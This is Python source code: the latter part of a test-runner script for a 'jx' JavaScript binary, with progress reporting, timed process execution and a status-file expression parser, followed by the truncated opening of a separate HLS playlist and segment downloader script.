print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class TapProgressIndicator(SimpleProgressIndicator):
def Starting(self):
print '1..%i' % len(self.cases)
self._done = 0
def AboutToRun(self, case):
pass
def HasRun(self, output):
self._done += 1
command = basename(output.command[-1])
if output.UnexpectedOutput():
print 'not ok %i - %s' % (self._done, command)
for l in output.output.stderr.splitlines():
print '#' + l
for l in output.output.stdout.splitlines():
print '#' + l
else:
print 'ok %i - %s' % (self._done, command)
duration = output.test.duration
# total_seconds() was added in 2.7
total_seconds = (duration.microseconds +
(duration.seconds + duration.days * 24 * 3600) * 10**6) / 10**6
print ' ---'
print ' duration_ms: %d.%d' % (total_seconds, duration.microseconds / 1000)
print ' ...'
def Done(self):
pass
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, templates):
super(CompactProgressIndicator, self).__init__(cases)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- CRASHED --- with exit code " + str(output.output.exit_code)
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
if not NO_TRUNCATE:
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'tap': TapProgressIndicator,
'mono': MonochromeProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, mode):
self.path = path
self.context = context
self.duration = None
self.mode = mode
def IsNegative(self):
return False
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode))
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def Run(self):
self.BeforeRun()
try:
result = self.RunCommand(self.GetCommand())
finally:
# Tests can leave the tty in non-blocking mode. If the test runner
# tries to print to stdout/stderr after that and the tty buffer is
# full, it'll die with a EAGAIN OSError. Ergo, put the tty back in
# blocking mode before proceeding.
if sys.platform != 'win32':
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
for fd in 0,1,2: fcntl(fd, F_SETFL, ~O_NONBLOCK & fcntl(fd, F_GETFL))
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasPreciousOutput(self):
return self.UnexpectedOutput() and self.store_unexpected_output
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0 and \
self.output.exit_code != -signal.SIGABRT
def HasTimedOut(self):
return self.output.timed_out;
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal.SIGTERM)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode);
except ImportError:
pass
return prev_error_mode
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
prev_error_mode = SEM_INVALID_VALUE;
if utils.IsWindows():
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX;
prev_error_mode = Win32SetErrorMode(error_mode);
Win32SetErrorMode(error_mode | prev_error_mode);
process = subprocess.Popen(
shell = utils.IsWindows(),
args = popen_args,
**rest
)
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
try:
os.unlink(name)
except OSError, e:
PrintError("os.unlink() " + str(e))
def Execute(args, context, timeout=None):
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
stdout = fd_out,
stderr = fd_err,
)
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def ExecuteNoCapture(args, context, timeout=None):
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
)
return CommandOutput(exit_code, False, "", "")
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(file[i]):
return False
return True
def GetTestStatus(self, sections, defs):
pass
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[]]
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, mode):
for v in VARIANT_FLAGS:
tests = self.GetConfiguration(context).ListTests(current_path, path, mode)
for t in tests: t.variant_flags = v
result += tests
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, mode)
result.sort(cmp=lambda a, b: cmp(a.GetName(), b.GetName()))
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
SUFFIX = {
'debug' : '_g',
'release' : '' }
FLAGS = {
'debug' : ['--enable-slow-asserts', '--debug-code', '--verify-heap'],
'release' : []}
TIMEOUT_SCALEFACTOR = {
'debug' : 4,
'release' : 1 }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, timeout, processor, suppress_dialogs, store_unexpected_output, options):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.vm_root = vm
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
self.repeat = options.repeat
if options.jxpath:
self.jxpath = options.jxpath
def GetVm(self, mode):
if mode == 'debug':
name = 'out/Debug/jx'
else:
name = 'out/Release/jx'
# Currently GYP does not support output_dir for MSVS.
# http://code.google.com/p/gyp/issues/detail?id=40
# It will put the builds into Release/node.exe or Debug/node.exe
if utils.IsWindows():
out_dir = os.path.join(dirname(__file__), "..", "out")
if not exists(out_dir):
if mode == 'debug':
name = os.path.abspath('Debug/jx.exe')
else:
name = os.path.abspath('Release/jx.exe')
else:
name = os.path.abspath(name + '.exe')
if hasattr(self, "jxpath"):
name = self.jxpath
return name
def GetVmCommand(self, testcase, mode):
return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode)
def GetVmFlags(self, testcase, mode):
return testcase.variant_flags + FLAGS[mode]
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[mode]
def RunTestCases(cases_to_run, progress, tasks):
progress = PROGRESS_INDICATORS[progress](cases_to_run)
return progress.Run(tasks)
def BuildRequirements(context, requirements, mode, scons_flags):
command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)]
+ requirements
+ scons_flags)
output = ExecuteNoCapture(command_line, context)
return output.exit_code == 0
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Everything(Set):
def Intersect(self, that):
return that
def Union(self, that):
return self
def IsEmpty(self):
return False
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left= Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
print "Malformed line: '%s'." % line
return False
return True
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons",
default=[], action="append")
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono, tap)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--no-build", help="Don't build requirements",
default=True, action="store_true")
result.add_option("--build-only", help="Only build requirements, don't run the tests",
default=False, action="store_true")
result.add_option("-r", "--repeat", help="Repeat count for each test",
default=1, type="int")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=60, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--simulator", help="Run tests with architecture simulator",
default='none')
result.add_option("--special-command", default=None)
result.add_option("--use-http1", help="Pass --use-http1 switch to node",
default=False, action="store_true")
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to V8 shell", default="shell")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("--jxpath", help="Path for jx binary file to be tested (if different than default)")
result.add_option("--nt", help="Does not truncate the name of currently tested file", default=False)
result.add_option("--no-truncate", help="Does not truncate the name of currently tested file", default=False)
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
global NO_TRUNCATE
NO_TRUNCATE = options.no_truncate or options.nt
options.mode = options.mode.split(',')
for mode in options.mode:
if not mode in ['debug', 'release']:
print "Unknown mode %s" % mode
return False
if options.simulator != 'none':
# Simulator argument was set. Make sure arch and simulator agree.
if options.simulator != options.arch:
if options.arch == 'none':
options.arch = options.simulator
else:
print "Architecture %s does not match sim %s" %(options.arch, options.simulator)
return False
# Ensure that the simulator argument is handed down to scons.
options.scons_flags.append("simulator=" + options.simulator)
else:
# If options.arch is not set by the command line and no simulator setting
# was found, set the arch to the guess.
if options.arch == 'none':
if ARCH_GUESS == None:
options.arch = ""
else:
options.arch = ARCH_GUESS
options.scons_flags.append("arch=" + options.arch)
if options.snapshot:
options.scons_flags.append("snapshot=on")
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(nocrash)4d tests are expected to be flaky but not crash
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFlaky(o):
return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o)
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not SKIP in c.outcomes]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
prefix = urllib.unquote(value[:pos]).split()
suffix = urllib.unquote(value[pos+1:]).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
BUILT_IN_TESTS = ['simple', 'pummel', 'message', 'internet', 'gc']
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
workspace = abspath(join(dirname(sys.argv[0]), '..'))
suites = GetSuites(join(workspace, 'test'))
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
if len(args) == 0:
paths = [SplitPath(t) for t in BUILT_IN_TESTS]
else:
paths = [ ]
for arg in args:
path = SplitPath(arg)
paths.append(path)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
shell = abspath(options.shell)
buildspace = dirname(shell)
processor = GetSpecialCommandProcessor(options.special_command)
if options.use_http1:
def wrap(processor):
return lambda args: processor(args[:1] + ['--use-http1'] + args[1:])
processor = wrap(processor)
context = Context(workspace,
buildspace,
VERBOSE,
shell,
options.timeout,
processor,
options.suppress_dialogs,
options.store_unexpected_output,
options)
# First build the required targets
if not options.no_build:
reqs = [ ]
for path in paths:
reqs += root.GetBuildRequirements(path, context)
reqs = list(set(reqs))
if len(reqs) > 0:
if options.j != 1:
options.scons_flags += ['-j', str(options.j)]
if not BuildRequirements(context, reqs, options.mode, options.scons_flags):
return 1
# Just return if we are only building the targets for running the tests.
if options.build_only:
return 0
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for mode in options.mode:
if not exists(context.GetVm(mode)):
print "Can't find shell executable: '%s'" % context.GetVm(mode)
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': options.arch,
'simulator': options.simulator
}
test_list = root.ListTests([], path, context, mode)
unclassified_tests += test_list
(cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env)
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = globally_unused_rules.intersection(unused_rules)
all_cases += cases
all_unused.append(unused_rules)
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
if options.report:
PrintReport(all_cases)
result = None
def DoSkip(case):
return SKIP in case.outcomes or SLOW in case.outcomes
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 0
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
hpd.py
|
#!/usr/bin/env python3
#
# Modified from:
# https://gist.github.com/anonymouss/5293c2421b4236fc1a38705fefd4f2e7
#
# Http Live Streaming -- fetcher/downloader
# A simple script to download segments/m3u8 files from given url, including
# variants and alternative renditions.
#
# TODO
# * BYTERANGE (multiple segments per file)
# * Absolute URIs - Would have to modify playlist
# * Additional HTTP headers - If needed
import argparse
import logging
import os
import threading
import urllib.request
import urllib.error
_auth_header = ""
_bytes_downloaded = 0
_bytes_total = 0
_counter_lock = threading.Lock()
_fetched_dict = dict()
_files_downloaded = 0
_files_total = 0
_max_concurrent_downloads = 10
_out_dir = ""
_threads = list()
_threads_lock = threading.Lock()
def fetch(url: tuple, out_dir: str) -> None:
global _bytes_total
global _fetched_dict
global _files_total
